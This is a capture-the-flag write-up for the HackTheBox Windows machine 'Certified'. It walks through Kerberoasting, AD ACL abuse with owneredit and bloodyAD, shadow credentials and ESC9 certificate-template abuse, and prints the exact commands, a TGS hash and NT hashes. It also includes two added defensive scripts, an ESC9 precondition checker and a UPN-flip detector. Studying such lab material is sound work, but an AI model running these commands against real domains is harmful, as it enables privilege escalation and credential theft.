Writeup for HackTheBox machine Certified
OS: Windows
Difficulty: medium (easy for me. haha)
IP: 10.10.11.41
Initial Creds: judith.mader / judith09
Port Scan

```
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
```
hostname: dc01.certified.htb
User Enumeration


Kerberoasting
We can try Kerberoasting to obtain TGS hashes that we can then attempt to crack with hashcat. Unfortunately the hash for user management_svc is not crackable.

```
impacket-GetUserSPNs -dc-ip 10.10.11.42 certified.htb/judith.mader:judith09
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$0942cc8d798a07f94d23f3d40f31c101$776c8d324e7e666f23dda53b33fec0cade021b6ee151eaa16879a340e22c48243d2802418c63da7fb897e2dac062e6ccc07a01f7162e67dbede725aba2351d3d4f0b691b8b1cba209c19e1ac523c749b023a9c846e60ea7fcfe2e598a8d598bddf3bdcdeaa70b9c3205ce472dccc57cf7dfa3f7a2cf83f607021f411a57ca5ec59152863314f2891cf438f34765df4ceec7660ba437714775981d7997cbf1f9d941e3afd0bfbe4be12227fd4b269a46c327a976d03806cd7dea9e9d538b9a99bd2400f829fd070e22945c1a1e3e3f822026d7506044ab68feea8e76077f95c30a273a13d15afa89c81e8659a20e4563f4ce215f44bfb745251401a55a443506e2f97c324baaa8580d03cdd7212bc764dfe4985d450533c08676620ebbbb3fce9bde8975142d1c58ac10bd87c38dd9b730fdfe28ffd63fd978f5e87f019c966b46c713c01754df8a51ef34ef47b178f78f52d64dca524cec57fbb2b77da9dd356c1307341b78d9f91d91a988fefcef49f7ded58e5fd77e23bf90d5957da0696c8b6ccb53e8dda629fe297e3447754b544ed2dea02d6f11ff8510deff0f9820ba033ae0f42deb640dd4a6f0cafd220a40001017d51eb74a8403dd53650d23e89798c05b0d1b918be1cfb5896f29890986af5d3e49d1ded510e3eb50b30fb6c7279374c2a0215a68b582a2cf45fd29025450c7a314f58907499ee5ac3eae981e3afd3bcf702602001f959a5fa1fc9109af00a33ba165cdfec907a5aa50b46e08e81c9f8bedc1783b3a20a02700e10b3056a09454738348e3a858b6aacca78e5a499499651e74682043d6bffc916074ff8133b052ffe9bd7fba76f10168ba85e4b05a3cf889634252d592bd524816a7ccc9ca8b0a78ecfb7f102af2b5915ccbab1555da29e1541e31989b156b6884ad5388f40523c5cca3be7e9ee8a9777acffeac23ca7a8edd1e095491a20c20b907220c96abe27ac5b67f478ced480650c06addeb87a94094727aae1692333f0171c8c8ae6b01cf549b437028a19742243004ecd104d18144243d71c5f1505d535db25a29f6e3205cc1fdec6d78adfe20ee8c2de20ed0d46fe0d2c470e06c77b9f7b2b7d8f863f8f2bfc68aae61d4dcb3eeceb3c2dd7c5c700eecf1015df7677678605aecdefe4657f7f5fd6df0f165e6ac573d8407b63e76e8c90c8168c0ecc9327a4c6cee0b901c9e7857595d6936d1aba6cfb55e947f61bed67d5c2a98eeb0ffc058c60d1d097065508e490653f22fddddd9d56b2434a7a74dd8b0a0be580a64b771a29f37da20f964d03beb53e1de660d4910d560dc1cf9d267e4877b0a91a7afeb0b594629
c973c08f4022e62aafd06cf72db68f411f19c029193e6cc302b96ce47264156969e819fb9c3c33749d7fc92f4f2d92a7ae1f0f194594e6e6fe13b28cd424dca74d31684b4bd7b13162fc878e4bb4e9a8df13240124bad0341c7030bc647b8534cf98046f5607f9ecc4336c7533fa9759f09b86653ee75c9d1e439c931899f0eee4b6d4f5aede0df9bdc6528ac9c172b72a49672d503b2117e1c7e7f1e1a141f618a1644e179a
```
Bloodhound
From BloodHound we can see that there is no direct route from our current user judith.mader to Administrator.

However, judith.mader has WriteOwner privileges on the Management group. This lets her change the owner of the group object, which can be done with impacket's owneredit.py.
```
python3 owneredit.py 'certified.htb'/'judith.mader':'judith09' -action write -new-owner 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB'
```
Now that judith owns the object, we grant her GenericAll on the group, giving her full control of it.
```
bloodyAD --host "10.10.11.41" -d "certified.htb" -u "judith.mader" -p "judith09" add genericAll Management judith.mader
```
We can then add judith to the Management group.
```
bloodyAD --host "10.10.11.41" -d "certified.htb" -u "judith.mader" -p "judith09" add groupMember "Management" "judith.mader"
```
Since the Management group has GenericAll on the user management_svc, we can:
- perform targeted Kerberoasting, which yields the same uncrackable hash we got from the initial Kerberoast, or
- use shadow credentials.

Check the following reference: ref
For shadow credentials we can use either pywhisker:

```
python3 pywhisker.py -d certified.htb -u judith.mader -p judith09 --target management_svc --action add
```

or certipy:

```
certipy-ad shadow auto -u "judith.mader"@"certified.htb" -p "judith09" -account "management_svc"
```
From this we obtain the NT hash for user management_svc and can log in via WinRM.

```
a091c1832bcdd4677c28b5a6a1295584
```
user.txt :)
ADCS
From BloodHound you can see that user management_svc has GenericWrite on user ca_operator, so we can change that user's password. Alternatively, the shadow credentials technique gives you the NT hash instead.
```
bloodyAD --host "10.10.11.41" -d "certified.htb" -u "management_svc" -p "a091c1832bcdd4677c28b5a6a1295584:a091c1832bcdd4677c28b5a6a1295584" set password "ca_operator" 'p@ssw0rd!'
```
As the name of this machine suggests, the intended path is to exploit ADCS.
The following command enumerates vulnerable certificate templates:
```
certipy-ad find -u ca_operator@certified.htb -p 'p@ssw0rd!' -dc-ip 10.10.11.41 -stdout -vulnerable
```
We can see that the CertifiedAuthentication template is misconfigured and vulnerable to ESC9 (it is enrollable by ca_operator and has no security extension). You can read more on this topic here.
```
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'certified-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : certified-DC01-CA
    DNS Name                            : DC01.certified.htb
    Certificate Subject                 : CN=certified-DC01-CA, DC=certified, DC=htb
    Certificate Serial Number           : 36472F2C180FBB9B4983AD4D60CD5A9D
    Certificate Validity Start          : 2024-05-13 15:33:41+00:00
    Certificate Validity End            : 2124-05-13 15:43:41+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CERTIFIED.HTB\Administrators
      Access Rights
        ManageCertificates              : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        ManageCa                        : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Enroll                          : CERTIFIED.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CertifiedAuthentication
    Display Name                        : Certified Authentication
    Certificate Authorities             : certified-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectAltRequireUpn
    Enrollment Flag                     : NoSecurityExtension
                                          AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\operator ca
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFIED.HTB\Administrator
        Write Owner Principals          : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
        Write Dacl Principals           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
        Write Property Principals        : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
    [!] Vulnerabilities
      ESC9                              : 'CERTIFIED.HTB\\operator ca' can enroll and template has no security extension
```
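As an added audit helper (not part of the original writeup or of certipy), the check below evaluates the ESC9 preconditions that the output above reports: the template fields mirror what certipy printed, and a defender would fill them from msPKI-Enrollment-Flag, pKIExtendedKeyUsage and the template DACL in AD. The KDC value StrongCertificateBindingEnforcement is the registry setting that closes the hole even when the template keeps the flag.

```python
"""ESC9 precondition check for a certificate template (added example)."""
from dataclasses import dataclass

# msPKI-Enrollment-Flag bits (MS-CRTD); the last one is what ESC9 hinges on.
CT_FLAG_PUBLISH_TO_DS = 0x8
CT_FLAG_AUTO_ENROLLMENT = 0x20
CT_FLAG_NO_SECURITY_EXTENSION = 0x80000

# EKUs that let a certificate authenticate to the KDC (names as certipy prints them).
AUTH_EKUS = {"Client Authentication", "Smart Card Logon",
             "PKINIT Client Authentication", "Any Purpose"}
# Enrollment by these principals is not a finding; real domains need a longer list.
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators", "Administrator"}


@dataclass
class Template:
    name: str
    enabled: bool
    enrollment_flag: int
    ekus: set
    enrollment_rights: set          # "DOMAIN\\principal" strings
    manager_approval: bool = False


def esc9_findings(t: Template, strong_binding: int) -> list:
    """Return why the template is ESC9-exploitable, or [] if any precondition fails.
    strong_binding is the KDC's StrongCertificateBindingEnforcement value (0 disabled,
    1 compatibility, 2 full); at 2 a certificate without the SID extension is rejected."""
    if not t.enabled or t.manager_approval:
        return []
    if not t.enrollment_flag & CT_FLAG_NO_SECURITY_EXTENSION:
        return []
    if not t.ekus & AUTH_EKUS:
        return []
    low_priv = {p for p in t.enrollment_rights if p.split("\\")[-1] not in PRIVILEGED}
    if not low_priv or strong_binding == 2:
        return []
    return [f"{t.name}: NoSecurityExtension set, so issued certs carry no SID",
            f"{t.name}: authenticating EKU present ({', '.join(sorted(t.ekus & AUTH_EKUS))})",
            f"{t.name}: non-admin enrollment by {', '.join(sorted(low_priv))}",
            f"KDC StrongCertificateBindingEnforcement is {strong_binding}, not 2"]


# The template from the certipy output above, flags recombined from the names it printed.
CERTIFIED_AUTH = Template(
    name="CertifiedAuthentication", enabled=True,
    enrollment_flag=CT_FLAG_NO_SECURITY_EXTENSION | CT_FLAG_AUTO_ENROLLMENT | CT_FLAG_PUBLISH_TO_DS,
    ekus={"Server Authentication", "Client Authentication"},
    enrollment_rights={"CERTIFIED.HTB\\operator ca", "CERTIFIED.HTB\\Domain Admins",
                       "CERTIFIED.HTB\\Enterprise Admins"})

if __name__ == "__main__":
    for line in esc9_findings(CERTIFIED_AUTH, strong_binding=1):
        print("[!]", line)
```

Remediation follows from whichever finding you clear first: drop the NoSecurityExtension flag, restrict enrollment to admins, or set StrongCertificateBindingEnforcement to 2 on every DC.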
To exploit this we need to change the UPN of user ca_operator to Administrator, which our GenericWrite over ca_operator allows.
```
certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584:a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator
```
Then, as user ca_operator, we request a certificate. The template name comes from the certipy output above.
```
certipy-ad req -username ca_operator@certified.htb -password 'p@ssw0rd!' -ca certified-DC01-CA -template CertifiedAuthentication
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
```
With administrator.pfx saved, we change the UPN back to ca_operator so that the KDC maps the certificate's UPN to the real Administrator account rather than to ca_operator.
```
certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584:a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator
```
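The two account updates above leave a distinctive trace: a low-privileged account's UPN is set to another account's name and reverted minutes later. The detection sketch below is an added example, not from the writeup; the event records are constructed to resemble what a SIEM extracts from Security event 4738 (old and new UPN), and the field names are assumptions.

```python
"""Detect the UPN flip used in the ESC9 chain (added example, constructed records)."""
from datetime import datetime, timedelta

PRIVILEGED_SAM = {"administrator"}   # names that must never appear in another account's UPN


def _prefix(upn):
    """Account part of a UPN; the attack sets a bare 'Administrator' with no @domain."""
    return (upn or "").split("@")[0].lower()


def detect_upn_flip(events, window=timedelta(hours=1)):
    """events: dicts with time, actor, target (account changed), old_upn, new_upn.
    Returns one alert per UPN set to a privileged account's name on a different
    account, plus one per revert of such a change within `window` (the clean-up step)."""
    alerts, pending = [], {}
    for e in sorted(events, key=lambda e: e["time"]):
        new, old, tgt = _prefix(e["new_upn"]), _prefix(e["old_upn"]), e["target"].lower()
        if new in PRIVILEGED_SAM and new != tgt:
            alerts.append(f"{e['time']:%H:%M} {e['actor']} set UPN of {e['target']} to '{e['new_upn']}'")
            pending[tgt] = e["time"]
        elif old in PRIVILEGED_SAM and tgt in pending and e["time"] - pending.pop(tgt) <= window:
            alerts.append(f"{e['time']:%H:%M} {e['actor']} reverted UPN of {e['target']} (flip completed)")
    return alerts


# Constructed sample mirroring the two account-update commands above, plus a benign rename.
T0 = datetime(2024, 11, 3, 10, 0)
SAMPLE = [
    {"time": T0, "actor": "management_svc", "target": "ca_operator",
     "old_upn": "ca_operator@certified.htb", "new_upn": "Administrator"},
    {"time": T0 + timedelta(minutes=4), "actor": "management_svc", "target": "ca_operator",
     "old_upn": "Administrator", "new_upn": "ca_operator"},
    {"time": T0 + timedelta(minutes=9), "actor": "helpdesk", "target": "j.doe",
     "old_upn": "jdoe@certified.htb", "new_upn": "j.doe@certified.htb"},
]

if __name__ == "__main__":
    for alert in detect_upn_flip(SAMPLE):
        print("[!]", alert)
```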
We can now use the certificate to authenticate and retrieve the Administrator NT hash.

```
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.41 -domain certified.htb
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
```
root.txt :)
We have pwned CERTIFIED.